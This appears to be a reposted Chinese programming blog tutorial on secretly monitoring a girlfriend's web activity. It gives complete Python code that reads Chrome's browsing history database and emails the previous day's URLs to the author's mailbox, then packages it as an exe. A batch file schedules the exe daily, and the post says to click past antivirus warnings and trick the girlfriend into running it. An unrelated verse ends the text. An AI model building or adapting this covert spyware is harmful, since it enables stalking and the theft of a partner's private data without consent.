目录
正文
原文:教大家一招用Python实时监控自己的女朋友每天上网都在做什么!
参考这个思路,尝试自己实现一下
1、文件可在以下路径找到,这是个sqllite数据库文件
- C:\Users\自己的用户名\AppData\Local\Google\Chrome\User Data\Default\History
2、使用DB Browser把这个文件加进来,打开后可以看到表信息,这里用到的urls表中的url和last_visit_time字段
3、使用sqlite3模块,读取表字段值,打印出来看看
打印本地时间戳
- >>> import time
- >>> time.time()
- 1534399058.524
这里发现其中last_visit_time字段的内容不太能理解,与当前时间戳相差甚大,Google发现这个值是以1601年为基准的时间戳,并且单位是微秒
iivaf...@gmail.com Thanks you a lot. I find reason. usual utc Unix-like system (Jan 1, 1970) Chrome start from new date 1601 so difference 11644473600 second to calculate usual date. Thanks you to helpfull links
4、对last_visit_time做判断,取得需要的数据
get_chrome_history.py代码如下:
PS:这里有个问题,chrome浏览器要手动关闭(也可以在代码里强制关掉),否则History文件被占用,db文件打开出错)
- # -*- coding:utf-8 -*-
- # __author__ :kusy
- # __content__:文件说明
- # __date__:2018/8/16 9:38
-
- """
- Get Visitied URLS in Chrome History
- """
-
- import sqlite3
- import time
- import datetime
- import os
- import getpass
- import pytz
-
-
- def get_history_data():
- #获取今天0点的日期
- now = datetime.datetime.now()
- now_000 = time.strftime('%Y-%m-%d',datetime.datetime.timetuple(now))
-
- #获取昨天0点的日期
- today = datetime.datetime.strptime(now_000,'%Y-%m-%d')
- yestoday = today - datetime.timedelta(days=1)
- basedate = datetime.datetime(1601,1,1)
-
- # 获取以1601年为基准的时间戳
- # today_timestamp = (today - basedate).total_seconds()
- yestoday_timestamp = (yestoday - basedate).total_seconds()
-
- # 获取当前系统登录用户名
- localuser = getpass.getuser()
- connstr = 'C:\\Users\\' + localuser + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History'
- # 校验Chrome文件是否存在
- if not os.path.exists(connstr):
- raise Exception('Chrome History File does not exists!')
-
- conn = sqlite3.connect(connstr)
- cur = conn.cursor()
- querystr = 'select url,last_visit_time from urls order by last_visit_time desc'
-
- try:
- cur.execute(querystr)
- except sqlite3.OperationalError:
- print('please close chrome browser at first!')
-
- data_all = cur.fetchall()
- expectdata = []
- for data in data_all:
- #微秒转换为秒
- last_visit_time = data[1] / 1000 / 1000
- # 获取昨天时间之后的内容,否则退出循环(查询数据已经倒序排列)
- if last_visit_time > yestoday_timestamp:
- # 转换访问时间,UTC转换时区 + 8h
- visit_time = basedate + datetime.timedelta(seconds=last_visit_time,hours=8)
- # #UTC转换时区
- # visit_time = visit_time.astimezone(pytz.timezone('Asia/Shanghai'))
- visit_time = time.strftime('%Y-%m-%d %H:%M:%S',datetime.datetime.timetuple(visit_time))
- expectdata.append(visit_time + ' ' + data[0])
- else:
- # 如果无历史数据,抛出异常提示
- if expectdata == []:
- raise Exception('there is no data.')
- break
- cur.close()
- conn.close()
- return '\n'.join(expectdata)
-
- if __name__ == '__main__':
- print(get_history_data())
1、sendemail.py代码如下
- # -*- coding:utf-8 -*-
- # __author__ :kusy
- # __content__:文件说明
- # __date__:2018/8/16 15:37
-
- from email.mime.text import MIMEText
- from email.header import Header
- from email.utils import parseaddr, formataddr
- import smtplib
-
- from get_chrome_history import get_history_data
-
-
- def _format_addr(s):
- name, addr = parseaddr(s)
- return formataddr((Header(name, 'utf-8').encode(), addr))
-
-
- def send():
- from_addr = 'sky_wangjz@163.com'
- password = 'xxxx.'
-
- to_addr = 'sky_wangjz@163.com'
- smtp_server = 'smtp.163.com'
-
- # 拼接发送内容
- mimestr = '<html><body><h1>昨日Chrome浏览记录</h1>'
- for hisdata in get_history_data().split('\n'):
- # 日期和网址分开
- hisdata_split = hisdata.split(' ')
- # print(hisdata_split)
- mimestr = mimestr + '<p>' + \
- hisdata_split[0] + \
- ' <a href=\"' + hisdata_split[1] + '\">' +\
- hisdata_split[1] + '</a></p>'
- mimestr = mimestr + '</body></html>'
-
- print(mimestr)
- msg = MIMEText(mimestr, 'html', 'utf-8')
- msg['From'] = _format_addr('Python爱好者 <%s>' % from_addr)
- msg['To'] = _format_addr('Python爱好者 <%s>' % to_addr)
- msg['Subject'] = Header('Chrome昨日浏览记录', 'utf-8').encode()
-
- server = smtplib.SMTP(smtp_server,25)
- server.set_debuglevel(1)
- server.login(from_addr,password)
- server.sendmail(from_addr,[to_addr],msg.as_string())
- server.quit()
-
- if __name__ == '__main__':
- send()
2、效果图如下
1、py文件打包成exe,安装pyinstaller工具
- C:\Users\suneee>pip3 install pyinstaller
- Collecting pyinstaller
- Downloading https://files.pythonhosted.org/packages/3c/86/909a8c35c5471919b3854c01f43843d9b5aed0e9
- 948b63e560010f7f3429/PyInstaller-3.3.1.tar.gz (3.5MB)
- 71% |██████████████████████▊ | 2.5MB 8.7kB/s eta 0:01:56
2、执行命令:pyinstaller -F sendemail.py
- Q:\PyWorkSpace\LearnPython>pyinstaller -F sendemail.py
- 148 INFO: PyInstaller: 3.3.1
- 148 INFO: Python: 3.6.3
- 148 INFO: Platform: Windows-7-6.1.7601-SP1
- 150 INFO: wrote Q:\PyWorkSpace\LearnPython\sendemail.spec
- 156 INFO: UPX is not available.
- 158 INFO: Extending PYTHONPATH with paths
- ['Q:\\PyWorkSpace\\LearnPython', 'Q:\\PyWorkSpace\\LearnPython']
- 158 INFO: checking Analysis
- 158 INFO: Building Analysis because out00-Analysis.toc is non existent
- 158 INFO: Initializing module dependency graph...
- 160 INFO: Initializing module graph hooks...
- 161 INFO: Analyzing base_library.zip ...
- 5476 INFO: running Analysis out00-Analysis.toc
- 5529 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
- required by c:\users\suneee\appdata\local\programs\python\python36\python.exe
- 6631 INFO: Caching module hooks...
- 6635 INFO: Analyzing Q:\PyWorkSpace\LearnPython\sendemail.py
- 7201 INFO: Processing pre-find module path hook distutils
- 8420 INFO: Loading module hooks...
- 8421 INFO: Loading module hook "hook-distutils.py"...
- 8433 INFO: Loading module hook "hook-encodings.py"...
- 8588 INFO: Loading module hook "hook-lib2to3.py"...
- 8598 INFO: Loading module hook "hook-pkg_resources.py"...
- 9021 INFO: Processing pre-safe import module hook win32com
- 9367 INFO: Loading module hook "hook-pydoc.py"...
- 9368 INFO: Loading module hook "hook-pythoncom.py"...
- 9709 INFO: Loading module hook "hook-pytz.py"...
- 9854 INFO: Loading module hook "hook-pywintypes.py"...
- 10100 INFO: Loading module hook "hook-sqlite3.py"...
- 10200 INFO: Loading module hook "hook-sysconfig.py"...
- 10201 INFO: Loading module hook "hook-win32com.py"...
- 10858 INFO: Loading module hook "hook-xml.py"...
- 11228 INFO: Looking for ctypes DLLs
- 11243 INFO: Analyzing run-time hooks ...
- 11246 INFO: Including run-time hook 'pyi_rth_pkgres.py'
- 11249 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
- 11252 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
- 11264 INFO: Looking for dynamic libraries
- 11756 INFO: Looking for eggs
- 11756 INFO: Using Python library c:\users\suneee\appdata\local\programs\python\python36\python36.dll
- 11756 INFO: Found binding redirects:
- []
- 11759 INFO: Warnings written to Q:\PyWorkSpace\LearnPython\build\sendemail\warnsendemail.txt
- 11818 INFO: Graph cross-reference written to Q:\PyWorkSpace\LearnPython\build\sendemail\xref-sendemail.html
- 11888 INFO: checking PYZ
- 11888 INFO: Building PYZ because out00-PYZ.toc is non existent
- 11888 INFO: Building PYZ (ZlibArchive) Q:\PyWorkSpace\LearnPython\build\sendemail\out00-PYZ.pyz
- 12544 INFO: Building PYZ (ZlibArchive) Q:\PyWorkSpace\LearnPython\build\sendemail\out00-PYZ.pyz completed successfully.
- 12555 INFO: checking PKG
- 12555 INFO: Building PKG because out00-PKG.toc is non existent
- 12557 INFO: Building PKG (CArchive) out00-PKG.pkg
- 12635 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\python36.dll
- 12639 INFO: Updating resource type 24 name 2 language 1033
- 12928 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_decimal.pyd
- 12928 INFO: Updating resource type 24 name 2 language 1033
- 12937 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_ctypes.pyd
- 12937 INFO: Updating resource type 24 name 2 language 1033
- 12944 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_multiprocessing.pyd
- 12946 INFO: Updating resource type 24 name 2 language 1033
- 13007 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_ssl.pyd
- 13008 INFO: Updating resource type 24 name 2 language 1033
- 13022 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\unicodedata.pyd
- 13022 INFO: Updating resource type 24 name 2 language 1033
- 13039 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\pyexpat.pyd
- 13040 INFO: Updating resource type 24 name 2 language 1033
- 13055 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_hashlib.pyd
- 13055 INFO: Updating resource type 24 name 2 language 1033
- 13067 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_bz2.pyd
- 13068 INFO: Updating resource type 24 name 2 language 1033
- 13086 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_lzma.pyd
- 13088 INFO: Updating resource type 24 name 2 language 1033
- 13104 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_socket.pyd
- 13104 INFO: Updating resource type 24 name 2 language 1033
- 13112 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\select.pyd
- 13113 INFO: Updating resource type 24 name 2 language 1033
- 13121 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\_sqlite3.pyd
- 13123 INFO: Updating resource type 24 name 2 language 1033
- 13176 INFO: Updating manifest in C:\Users\suneee\AppData\Roaming\pyinstaller\bincache00_py36_64bit\sqlite3.dll
- 13177 INFO: Updating resource type 24 name 2 language 1033
- 17795 INFO: Building PKG (CArchive) out00-PKG.pkg completed successfully.
- 17872 INFO: Bootloader c:\users\suneee\appdata\local\programs\python\python36\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
- 17872 INFO: checking EXE
- 17872 INFO: Building EXE because out00-EXE.toc is non existent
- 17873 INFO: Building EXE from out00-EXE.toc
- 17873 INFO: Appending archive to EXE Q:\PyWorkSpace\LearnPython\dist\sendemail.exe
- 17884 INFO: Building EXE from out00-EXE.toc completed successfully.
-
- Q:\PyWorkSpace\LearnPython>
执行完之后,可以看到生成了exe文件,运行一下,被360阻止发邮件,允许,成功发送
3、把这个exe文件使用批处理做计划任务(每天10点执行),运行bat文件,360阻止的话也允许(bat文件和exe文件放在同一路径即可)
- rem delete task :send_chrome_history
- schtasks /delete /tn "send_chrome_history" /f
- rem add task :send_chrome_history
- schtasks /create /tn "send_chrome_history" /tr ".\sendemail.exe" /st 10:00 /sc DAILY
- rem run right now
- sendemail.exe
可以看到计划任务已经添加成功了,以后每天10点都会自动执行
4、一切都准备好了,然后发给妹子,策略是否成功就看妹子到底有多傻了^o^
金瓦金銮殿,皇上看不见; 一朝出了午门口,一个鼻子两只手。 金瓦金銮殿,皇上不坐殿; 一朝出了京门口,百姓的事儿牵着走牵着走。
原文:https://www.cnblogs.com/kusy/p/9487722.html